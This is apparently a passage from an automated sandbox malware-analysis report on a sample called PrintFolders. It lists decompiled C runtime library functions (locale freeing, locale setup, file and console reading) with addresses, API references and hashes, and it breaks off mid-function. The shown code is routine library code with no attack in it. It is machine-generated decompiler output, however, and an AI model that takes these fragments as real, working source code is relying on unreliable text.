Instruction ID: ce84940d4ec221c3e00cea4fbe0e61062730256890f47c7b2aa3b88f8ab69c0d
Opcode Fuzzy Hash: a944ca6634b5d74932c30d559000e04cde607573212888ef64c986212d955d2d
Instruction Fuzzy Hash: 28314E31600601AEFB219E3AD845B9B77E4AF01B15F14881FE455D72A1DF78EE818B1C

Uniqueness

Uniqueness Score: -1.00%

Function 00426386 Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00426386(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x43d160) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E0041E2B8(_t46);
							E00425632( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E0041E2B8(_t47);
							E00425AE6( *((intOrPtr*)(_t74 + 0x88)));
						}
						E0041E2B8( *((intOrPtr*)(_t74 + 0x7c)));
						E0041E2B8( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E0041E2B8( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E0041E2B8( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E0041E2B8( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E0041E2B8( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E004264F7( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x43d290) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E0041E2B8(_t31);
							E0041E2B8( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E0041E2B8(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E0041E2B8(_t74);
			}

0x0042638e
0x00426392
0x0042639a
0x004263a3
0x004263a8
0x004263af
0x004263b7
0x004263bf
0x004263ca
0x004263d0
0x004263d1
0x004263d9
0x004263e1
0x004263ec
0x004263f2
0x004263f6
0x00426401
0x00426407
0x004263a8
0x00426408
0x00426410
0x00426423
0x00426436
0x00426444
0x0042644f
0x00426454
0x0042645d
0x00426465
0x00426466
0x0042646c
0x0042646f
0x00426472
0x00426479
0x0042647b
0x0042647f
0x00426487
0x0042648e
0x00426494
0x00426495
0x00426495
0x0042649c
0x0042649e
0x004264a3
0x004264ab
0x004264b0
0x004264b1
0x004264b1
0x004264b4
0x004264b7
0x004264ba
0x004264bd
0x004264bd
0x004264cd

APIs

___free_lconv_mon.LIBCMT ref: 004263CA

Part of subcall function 00425632: _free.LIBCMT ref: 0042564F
Part of subcall function 00425632: _free.LIBCMT ref: 00425661
Part of subcall function 00425632: _free.LIBCMT ref: 00425673
Part of subcall function 00425632: _free.LIBCMT ref: 00425685
Part of subcall function 00425632: _free.LIBCMT ref: 00425697
Part of subcall function 00425632: _free.LIBCMT ref: 004256A9
Part of subcall function 00425632: _free.LIBCMT ref: 004256BB
Part of subcall function 00425632: _free.LIBCMT ref: 004256CD
Part of subcall function 00425632: _free.LIBCMT ref: 004256DF
Part of subcall function 00425632: _free.LIBCMT ref: 004256F1
Part of subcall function 00425632: _free.LIBCMT ref: 00425703
Part of subcall function 00425632: _free.LIBCMT ref: 00425715
Part of subcall function 00425632: _free.LIBCMT ref: 00425727

_free.LIBCMT ref: 004263BF

Part of subcall function 0041E2B8: HeapFree.KERNEL32(00000000,00000000,?,00425D87,?,00000000,?,?,?,0042602A,?,00000007,?,?,0042651D,?), ref: 0041E2CE
Part of subcall function 0041E2B8: GetLastError.KERNEL32(?,?,00425D87,?,00000000,?,?,?,0042602A,?,00000007,?,?,0042651D,?,?), ref: 0041E2E0

_free.LIBCMT ref: 004263E1
_free.LIBCMT ref: 004263F6
_free.LIBCMT ref: 00426401
_free.LIBCMT ref: 00426423
_free.LIBCMT ref: 00426436
_free.LIBCMT ref: 00426444
_free.LIBCMT ref: 0042644F
_free.LIBCMT ref: 00426487
_free.LIBCMT ref: 0042648E
_free.LIBCMT ref: 004264AB
_free.LIBCMT ref: 004264C3

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 88f30a99e55331c7f508eb551a6b5f58649f1248a518a039e11fef256e7b3f57
Instruction ID: e81e40b5f298d664f8950b5869667bb163734d9678a7409bf98161f4c1fe4a14
Opcode Fuzzy Hash: 88f30a99e55331c7f508eb551a6b5f58649f1248a518a039e11fef256e7b3f57
Instruction Fuzzy Hash: D33162316006149FEB24AA7AE845B9BB3E8AF00314F91456FE899D7291DF7CEC80C71C

Uniqueness

Uniqueness Score: -1.00%

Function 00425730 Relevance: 18.4, APIs: 12, Instructions: 373
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00425730(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				signed int _t106;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t126;
				signed int _t130;
				signed int _t134;
				signed int _t138;
				signed int _t142;
				signed int _t146;
				signed int _t150;
				signed int _t154;
				signed int _t158;
				signed int _t162;
				signed int _t166;
				signed int _t170;
				signed int _t174;
				signed int _t178;
				signed int _t182;
				signed int _t186;
				signed int _t190;
				char _t196;
				char _t209;
				signed int _t212;
				char _t221;
				char _t222;
				void* _t225;
				char* _t227;
				signed int _t228;
				signed int _t232;
				signed int _t233;
				intOrPtr _t234;
				void* _t235;
				void* _t237;
				char* _t258;

				_t225 = __edx;
				_t209 = _a4;
				_v16 = 0;
				_v28 = _t209;
				_v24 = 0;
				if( *((intOrPtr*)(_t209 + 0xac)) != 0 ||  *((intOrPtr*)(_t209 + 0xb0)) != 0) {
					_t235 = E0041E25B(1, 0x50);
					_v8 = _t235;
					E0041E2B8(0);
					if(_t235 != 0) {
						_t228 = E0041E25B(1, 4);
						_v12 = _t228;
						E0041E2B8(0);
						if(_t228 != 0) {
							if( *((intOrPtr*)(_t209 + 0xac)) == 0) {
								_t212 = 0x14;
								memcpy(_v8, 0x43d160, _t212 << 2);
								L24:
								_t237 = _v8;
								_t232 = _v16;
								 *_t237 =  *( *(_t209 + 0x88));
								 *((intOrPtr*)(_t237 + 4)) =  *((intOrPtr*)( *(_t209 + 0x88) + 4));
								 *((intOrPtr*)(_t237 + 8)) =  *((intOrPtr*)( *(_t209 + 0x88) + 8));
								 *((intOrPtr*)(_t237 + 0x30)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x30));
								 *((intOrPtr*)(_t237 + 0x34)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t232 != 0) {
									 *_t232 = 1;
								}
								goto L26;
							}
							_t233 = E0041E25B(1, 4);
							_v16 = _t233;
							E0041E2B8(0);
							if(_t233 != 0) {
								_t234 =  *((intOrPtr*)(_t209 + 0xac));
								_t14 = _t235 + 0xc; // 0xc
								_t116 = E004216C5(_t225);
								_t118 = E004216C5(_t225,  &_v28, 1, _t234, 0x14, _v8 + 0x10,  &_v28);
								_t122 = E004216C5(_t225,  &_v28, 1, _t234, 0x16, _v8 + 0x14, 1);
								_t126 = E004216C5(_t225,  &_v28, 1, _t234, 0x17, _v8 + 0x18, _t234);
								_v20 = _v8 + 0x1c;
								_t130 = E004216C5(_t225,  &_v28, 1, _t234, 0x18, _v8 + 0x1c, 0x15);
								_t134 = E004216C5(_t225,  &_v28, 1, _t234, 0x50, _v8 + 0x20, _t14);
								_t138 = E004216C5(_t225);
								_t142 = E004216C5(_t225,  &_v28, 0, _t234, 0x1a, _v8 + 0x28,  &_v28);
								_t146 = E004216C5(_t225,  &_v28, 0, _t234, 0x19, _v8 + 0x29, 1);
								_t150 = E004216C5(_t225,  &_v28, 0, _t234, 0x54, _v8 + 0x2a, _t234);
								_t154 = E004216C5(_t225,  &_v28, 0, _t234, 0x55, _v8 + 0x2b, 0x51);
								_t158 = E004216C5(_t225,  &_v28, 0, _t234, 0x56, _v8 + 0x2c, _v8 + 0x24);
								_t162 = E004216C5(_t225);
								_t166 = E004216C5(_t225,  &_v28, 0, _t234, 0x52, _v8 + 0x2e,  &_v28);
								_t170 = E004216C5(_t225,  &_v28, 0, _t234, 0x53, _v8 + 0x2f, 0);
								_t174 = E004216C5(_t225,  &_v28, 2, _t234, 0x15, _v8 + 0x38, _t234);
								_t178 = E004216C5(_t225,  &_v28, 2, _t234, 0x14, _v8 + 0x3c, 0x57);
								_t182 = E004216C5(_t225,  &_v28, 2, _t234, 0x16, _v8 + 0x40, _v8 + 0x2d);
								_push(_v8 + 0x44);
								_push(0x17);
								_push(_t234);
								_t186 = E004216C5(_t225);
								_t190 = E004216C5(_t225,  &_v28, 2, _t234, 0x50, _v8 + 0x48,  &_v28);
								if((E004216C5(_t225,  &_v28, 2, _t234, 0x51, _v8 + 0x4c, 2) | _t116 | _t118 | _t122 | _t126 | _t130 | _t134 | _t138 | _t142 | _t146 | _t150 | _t154 | _t158 | _t162 | _t166 | _t170 | _t174 | _t178 | _t182 | _t186 | _t190) == 0) {
									_t227 =  *_v20;
									while(1) {
										_t196 =  *_t227;
										if(_t196 == 0) {
											break;
										}
										_t61 = _t196 - 0x30; // -48
										_t221 = _t61;
										if(_t221 > 9) {
											if(_t196 != 0x3b) {
												L16:
												_t227 = _t227 + 1;
												continue;
											}
											_t258 = _t227;
											do {
												_t222 =  *((intOrPtr*)(_t258 + 1));
												 *_t258 = _t222;
												_t258 = _t258 + 1;
											} while (_t222 != 0);
											continue;
										}
										 *_t227 = _t221;
										goto L16;
									}
									goto L24;
								}
								E00425632(_v8);
								E0041E2B8(_v8);
								E0041E2B8(_v12);
								E0041E2B8(_v16);
								goto L4;
							}
							E0041E2B8(_t235);
							E0041E2B8(_v12);
							L7:
							goto L4;
						}
						E0041E2B8(_t235);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t232 = 0;
					_v12 = 0;
					_t237 = 0x43d160;
					L26:
					_t106 =  *(_t209 + 0x84);
					if(_t106 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t209 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t106 | 0xffffffff) == 0) {
							E0041E2B8( *(_t209 + 0x88));
							E0041E2B8( *((intOrPtr*)(_t209 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t209 + 0x7c)) = _v12;
					 *(_t209 + 0x84) = _t232;
					 *(_t209 + 0x88) = _t237;
					return 0;
				}
			}

0x00425730
0x00425739
0x00425740
0x00425743
0x00425746
0x0042574f
0x00425771
0x00425775
0x00425778
0x00425782
0x00425795
0x00425799
0x0042579c
0x004257a6
0x004257b8
0x00425a4a
0x00425a4b
0x00425a4d
0x00425a55
0x00425a59
0x00425a5e
0x00425a69
0x00425a75
0x00425a81
0x00425a8d
0x00425a93
0x00425a97
0x00425a99
0x00425a99
0x00000000
0x00425a97
0x004257c7
0x004257cb
0x004257ce
0x004257d8
0x004257ec
0x004257f2
0x004257ff
0x00425816
0x0042582d
0x00425844
0x00425854
0x00425861
0x00425878
0x0042588f
0x004258a6
0x004258c0
0x004258d7
0x004258ee
0x00425905
0x0042591f
0x00425936
0x0042594d
0x00425964
0x0042597e
0x00425995
0x004259a2
0x004259a3
0x004259a5
0x004259ac
0x004259c3
0x004259e7
0x00425a15
0x00425a24
0x00425a24
0x00425a28
0x00000000
0x00000000
0x00425a19
0x00425a19
0x00425a1f
0x00425a2e
0x00425a23
0x00425a23
0x00000000
0x00425a23
0x00425a30
0x00425a32
0x00425a32
0x00425a35
0x00425a37
0x00425a3a
0x00000000
0x00425a3e
0x00425a21
0x00000000
0x00425a21
0x00000000
0x00425a2a
0x004259ed
0x004259f3
0x004259fc
0x00425a05
0x00000000
0x00425a0a
0x004257db
0x004257e4
0x004257ae
0x00000000
0x004257ae
0x004257a9
0x00000000
0x004257a9
0x00425784
0x00000000
0x00425759
0x00425759
0x0042575b
0x0042575e
0x00425a9b
0x00425a9b
0x00425aa3
0x00425aa5
0x00425aa5
0x00425aad
0x00425ab2
0x00425ab6
0x00425abe
0x00425ac6
0x00425acc
0x00425ab6
0x00425ad0
0x00425ad5
0x00425adb
0x00000000
0x00425adb

APIs

_free.LIBCMT ref: 00425778
_free.LIBCMT ref: 0042579C
_free.LIBCMT ref: 004257A9
_free.LIBCMT ref: 004257CE
_free.LIBCMT ref: 004257DB
_free.LIBCMT ref: 004257E4
_free.LIBCMT ref: 00425ABE
_free.LIBCMT ref: 00425AC6

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: d1ccfb6d5d4b89e14be0686283f280dc6ec478f279d77e8c09b8cbf74dc5944d
Instruction ID: 569e6a71d5f44d06fa27ae0c400f08ba275592510054ad0f9e67e0790a3e9e44
Opcode Fuzzy Hash: d1ccfb6d5d4b89e14be0686283f280dc6ec478f279d77e8c09b8cbf74dc5944d
Instruction Fuzzy Hash: 3DC16275F40214AFDB20DAA9DC86FDFB7F8AF48704F54016AFA05FB282D67499408B58

Uniqueness

Uniqueness Score: -1.00%

Function 0041D783 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E0041D783(signed int _a4, void* _a8, unsigned int _a12) {
				char _v5;
				signed int _v12;
				long _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				long _v32;
				char _v36;
				void* _v40;
				long _v44;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t143;
				unsigned int _t154;
				intOrPtr _t158;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t174;
				signed int _t178;
				void _t180;
				char _t185;
				char _t190;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t207;
				long _t210;
				unsigned int _t212;
				intOrPtr _t214;
				unsigned int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed char _t224;
				char _t226;
				signed int _t228;
				void* _t229;
				signed int _t230;
				char* _t231;
				char* _t232;
				signed int _t235;
				signed int _t236;
				void* _t240;
				void* _t242;
				void* _t243;

				_t198 = _a4;
				_t246 = _t198 - 0xfffffffe;
				if(_t198 != 0xfffffffe) {
					__eflags = _t198;
					if(__eflags < 0) {
						L59:
						_t137 = E004135DE(__eflags);
						 *_t137 =  *_t137 & 0x00000000;
						__eflags =  *_t137;
						 *((intOrPtr*)(E004135F1( *_t137))) = 9;
						L60:
						_t139 = E00413517();
						goto L61;
					}
					__eflags = _t198 -  *0x450ae0; // 0x40
					if(__eflags >= 0) {
						goto L59;
					}
					_t207 = _t198 >> 6;
					_t235 = (_t198 & 0x0000003f) * 0x38;
					_v12 = _t207;
					_t143 =  *((intOrPtr*)(0x4508e0 + _t207 * 4));
					_v20 = _t235;
					_v36 = 1;
					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
					__eflags = 1 & _t224;
					if(__eflags == 0) {
						goto L59;
					}
					_t210 = _a12;
					__eflags = _t210 - 0x7fffffff;
					if(__eflags <= 0) {
						__eflags = _t210;
						if(_t210 == 0) {
							L58:
							return 0;
						}
						__eflags = _t224 & 0x00000002;
						if((_t224 & 0x00000002) != 0) {
							goto L58;
						}
						__eflags = _a8;
						if(__eflags == 0) {
							goto L6;
						}
						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
						_v5 = _t226;
						_t240 = 0;
						_t228 = _t226 - 1;
						__eflags = _t228;
						if(_t228 == 0) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags == 0) {
								L14:
								 *(E004135DE(__eflags)) =  *_t149 & _t240;
								 *((intOrPtr*)(E004135F1(__eflags))) = 0x16;
								E00413517();
								goto L39;
							} else {
								_t154 = 4;
								_t212 = _t210 >> 1;
								_v16 = _t154;
								__eflags = _t212 - _t154;
								if(_t212 >= _t154) {
									_t154 = _t212;
									_v16 = _t212;
								}
								_t240 = E0041ED2F(_t154);
								E0041E2B8(0);
								E0041E2B8(0);
								_t243 = _t242 + 0xc;
								_v24 = _t240;
								__eflags = _t240;
								if(__eflags != 0) {
									_t158 = E0041D158(_t198, 0, 0, 1);
									_t242 = _t243 + 0x10;
									_t214 =  *((intOrPtr*)(0x4508e0 + _v12 * 4));
									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
									 *(_t235 + _t214 + 0x24) = _t228;
									_t229 = _t240;
									_t210 = _v16;
									_t143 =  *((intOrPtr*)(0x4508e0 + _v12 * 4));
									L22:
									_t199 = _v20;
									_t235 = 0;
									_v40 = _t229;
									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
									_t200 = _a4;
									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
										_t180 =  *((intOrPtr*)(_v20 + _t143 + 0x2a));
										_t200 = _a4;
										__eflags = _t180 - 0xa;
										if(_t180 != 0xa) {
											__eflags = _t210;
											if(_t210 != 0) {
												_t235 = 1;
												 *_t229 = _t180;
												_t231 = _t229 + 1;
												_t220 = _t210 - 1;
												__eflags = _v5;
												_v24 = _t231;
												_v16 = _t220;
												 *((char*)(_v20 +  *((intOrPtr*)(0x4508e0 + _v12 * 4)) + 0x2a)) = 0xa;
												_t200 = _a4;
												if(_v5 != 0) {
													_t185 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x4508e0 + _v12 * 4)) + 0x2b));
													_t200 = _a4;
													__eflags = _t185 - 0xa;
													if(_t185 != 0xa) {
														__eflags = _t220;
														if(_t220 != 0) {
															 *_t231 = _t185;
															_t232 = _t231 + 1;
															_t221 = _t220 - 1;
															__eflags = _v5 - 1;
															_v24 = _t232;
															_t235 = 2;
															_v16 = _t221;
															 *((char*)(_v20 +  *((intOrPtr*)(0x4508e0 + _v12 * 4)) + 0x2b)) = 0xa;
															_t200 = _a4;
															if(_v5 == 1) {
																_t190 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x4508e0 + _v12 * 4)) + 0x2c));
																_t200 = _a4;
																__eflags = _t190 - 0xa;
																if(_t190 != 0xa) {
																	__eflags = _t221;
																	if(_t221 != 0) {
																		 *_t232 = _t190;
																		_t222 = _t221 - 1;
																		__eflags = _t222;
																		_v16 = _t222;
																		_v24 = _t232 + 1;
																		_t235 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0x4508e0 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = E00427ED7(_t200);
									__eflags = _t160;
									if(_t160 == 0) {
										L42:
										_v36 = 0;
										L43:
										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0);
										__eflags = _t163;
										if(_t163 == 0) {
											L54:
											_t164 = GetLastError();
											_t235 = 5;
											__eflags = _t164 - _t235;
											if(__eflags != 0) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L38:
													E004135BB(_t164);
													goto L39;
												}
												_t236 = 0;
												goto L40;
											}
											 *((intOrPtr*)(E004135F1(__eflags))) = 9;
											 *(E004135DE(__eflags)) = _t235;
											goto L39;
										}
										_t217 = _a12;
										__eflags = _v32 - _t217;
										if(_v32 > _t217) {
											goto L54;
										}
										_t236 = _t235 + _v32;
										__eflags = _t236;
										L46:
										_t230 = _v20;
										_t169 =  *((intOrPtr*)(0x4508e0 + _v12 * 4));
										__eflags =  *((char*)(_t230 + _t169 + 0x28));
										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v36;
												_push(_t236 >> 1);
												_push(_v40);
												_push(_t200);
												if(_v36 == 0) {
													_t170 = E0041D2EE();
												} else {
													_t170 = E0041D5F4();
												}
											} else {
												_t218 = _t217 >> 1;
												__eflags = _t217 >> 1;
												_t170 = E0041D49D(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
											}
											_t236 = _t170;
										}
										goto L40;
									}
									_t219 = _v20;
									_t172 =  *((intOrPtr*)(0x4508e0 + _v12 * 4));
									__eflags =  *((char*)(_t219 + _t172 + 0x28));
									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
										goto L42;
									}
									_t174 = GetConsoleMode(_v28,  &_v44);
									__eflags = _t174;
									if(_t174 == 0) {
										goto L42;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L43;
									}
									_t111 =  &_v16; // 0xa
									_t178 = ReadConsoleW(_v28, _v24,  *_t111 >> 1,  &_v32, 0);
									__eflags = _t178;
									if(_t178 != 0) {
										_t217 = _a12;
										_t236 = _t235 + _v32 * 2;
										goto L46;
									}
									_t164 = GetLastError();
									goto L38;
								} else {
									 *((intOrPtr*)(E004135F1(__eflags))) = 0xc;
									 *(E004135DE(__eflags)) = 8;
									L39:
									_t236 = _t235 | 0xffffffff;
									__eflags = _t236;
									L40:
									E0041E2B8(_t240);
									return _t236;
								}
							}
						}
						__eflags = _t228 == 1;
						if(_t228 == 1) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags != 0) {
								_t229 = _a8;
								_v16 = _t210;
								_v24 = _t229;
								_t143 =  *((intOrPtr*)(0x4508e0 + _v12 * 4));
								goto L22;
							}
							goto L14;
						} else {
							_t229 = _a8;
							_v16 = _t210;
							_v24 = _t229;
							goto L22;
						}
					}
					L6:
					 *(E004135DE(__eflags)) =  *_t145 & 0x00000000;
					 *((intOrPtr*)(E004135F1(__eflags))) = 0x16;
					goto L60;
				} else {
					 *(E004135DE(_t246)) =  *_t197 & 0x00000000;
					_t139 = E004135F1(_t246);
					 *_t139 = 9;
					L61:
					return _t139 | 0xffffffff;
				}
			}

0x0041d78c
0x0041d790
0x0041d793
0x0041d7ad
0x0041d7af
0x0041db14
0x0041db14
0x0041db19
0x0041db19
0x0041db21
0x0041db27
0x0041db27
0x00000000
0x0041db27
0x0041d7b5
0x0041d7bb
0x00000000
0x00000000
0x0041d7c5
0x0041d7cb
0x0041d7ce
0x0041d7d1
0x0041d7db
0x0041d7de
0x0041d7e1
0x0041d7e5
0x0041d7e7
0x00000000
0x00000000
0x0041d7ed
0x0041d7f0
0x0041d7f6
0x0041d810
0x0041d812
0x0041db10
0x00000000
0x0041db10
0x0041d818
0x0041d81b
0x00000000
0x00000000
0x0041d821
0x0041d825
0x00000000
0x00000000
0x0041d82b
0x0041d82e
0x0041d832
0x0041d839
0x0041d83b
0x0041d83b
0x0041d83e
0x0041d893
0x0041d895
0x0041d85b
0x0041d860
0x0041d867
0x0041d86d
0x00000000
0x0041d897
0x0041d899
0x0041d89a
0x0041d89c
0x0041d89f
0x0041d8a1
0x0041d8a3
0x0041d8a5
0x0041d8a5
0x0041d8b0
0x0041d8b2
0x0041d8b9
0x0041d8be
0x0041d8c1
0x0041d8c4
0x0041d8c6
0x0041d8ea
0x0041d8f2
0x0041d8f5
0x0041d8fc
0x0041d903
0x0041d907
0x0041d909
0x0041d90c
0x0041d913
0x0041d913
0x0041d916
0x0041d918
0x0041d91b
0x0041d920
0x0041d923
0x0041d92c
0x0041d930
0x0041d933
0x0041d935
0x0041d93b
0x0041d93d
0x0041d946
0x0041d947
0x0041d949
0x0041d94d
0x0041d94e
0x0041d952
0x0041d955
0x0041d95f
0x0041d964
0x0041d967
0x0041d976
0x0041d97a
0x0041d97d
0x0041d97f
0x0041d981
0x0041d983
0x0041d988
0x0041d98a
0x0041d98e
0x0041d98f
0x0041d995
0x0041d99f
0x0041d9a0
0x0041d9a3
0x0041d9a8
0x0041d9ab
0x0041d9ba
0x0041d9be
0x0041d9c1
0x0041d9c3
0x0041d9c5
0x0041d9c7
0x0041d9c9
0x0041d9cf
0x0041d9cf
0x0041d9d0
0x0041d9df
0x0041d9e2
0x0041d9e3
0x0041d9e3
0x0041d9c7
0x0041d9c3
0x0041d9ab
0x0041d983
0x0041d97f
0x0041d967
0x0041d93d
0x0041d935
0x0041d9e9
0x0041d9ef
0x0041d9f1
0x0041da64
0x0041da64
0x0041da68
0x0041da78
0x0041da7e
0x0041da80
0x0041dadc
0x0041dadc
0x0041dae4
0x0041dae5
0x0041dae7
0x0041db00
0x0041db03
0x0041da40
0x0041da41
0x00000000
0x0041da46
0x0041db09
0x00000000
0x0041db09
0x0041daee
0x0041daf9
0x00000000
0x0041daf9
0x0041da82
0x0041da85
0x0041da88
0x00000000
0x00000000
0x0041da8a
0x0041da8a
0x0041da8d
0x0041da90
0x0041da93
0x0041da9a
0x0041da9f
0x0041daa1
0x0041daa5
0x0041dac0
0x0041dac4
0x0041dac5
0x0041dac8
0x0041dac9
0x0041dad5
0x0041dacb
0x0041dacb
0x0041dacb
0x0041daa7
0x0041daa7
0x0041daa7
0x0041dab2
0x0041dab7
0x0041daba
0x0041daba
0x00000000
0x0041da9f
0x0041d9f6
0x0041d9f9
0x0041da00
0x0041da05
0x00000000
0x00000000
0x0041da0e
0x0041da14
0x0041da16
0x00000000
0x00000000
0x0041da18
0x0041da1c
0x00000000
0x00000000
0x0041da24
0x0041da30
0x0041da36
0x0041da38
0x0041da5c
0x0041da5f
0x00000000
0x0041da5f
0x0041da3a
0x00000000
0x0041d8c8
0x0041d8cd
0x0041d8d8
0x0041da47
0x0041da47
0x0041da47
0x0041da4a
0x0041da4b
0x00000000
0x0041da53
0x0041d8c6
0x0041d895
0x0041d840
0x0041d843
0x0041d857
0x0041d859
0x0041d87a
0x0041d87d
0x0041d880
0x0041d883
0x00000000
0x0041d883
0x00000000
0x0041d845
0x0041d845
0x0041d848
0x0041d84b
0x00000000
0x0041d84b
0x0041d843
0x0041d7f8
0x0041d7fd
0x0041d805
0x00000000
0x0041d795
0x0041d79a
0x0041d79d
0x0041d7a2
0x0041db2c
0x00000000
0x0041db2c

Strings

, xrefs: 0041DA24, 0041DA29

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 8f4f84f8da90cf00b070d342344e91b5c399ffd5b14068e3114e3e9a8c8d54fe
Instruction ID: 414b9fb87afc50a8a3d8bfe03c00f007ed18bb814e769fe5a88ecae7e3a98d83
Opcode Fuzzy Hash: 8f4f84f8da90cf00b070d342344e91b5c399ffd5b14068e3114e3e9a8c8d54fe
Instruction Fuzzy Hash: ACC106F0E08245AFDF15DF99C881BEE7BB5AF49304F04405AE415AB392C7789AC1CB69

Uniqueness

Uniqueness Score: -1.00%

Function 10004C21 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 63%

			E10004C21(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t202;
				signed int _t203;
				char _t204;
				signed int _t206;
				signed int _t208;
				signed char* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t215;
				void* _t218;
				signed char* _t221;
				void* _t223;
				void* _t225;
				signed char _t229;
				signed int _t230;
				void* _t232;
				void* _t235;
				void* _t238;
				signed char _t245;
				signed int _t250;
				void* _t253;
				signed int* _t255;
				signed int _t256;
				intOrPtr _t257;
				signed int _t258;
				void* _t263;
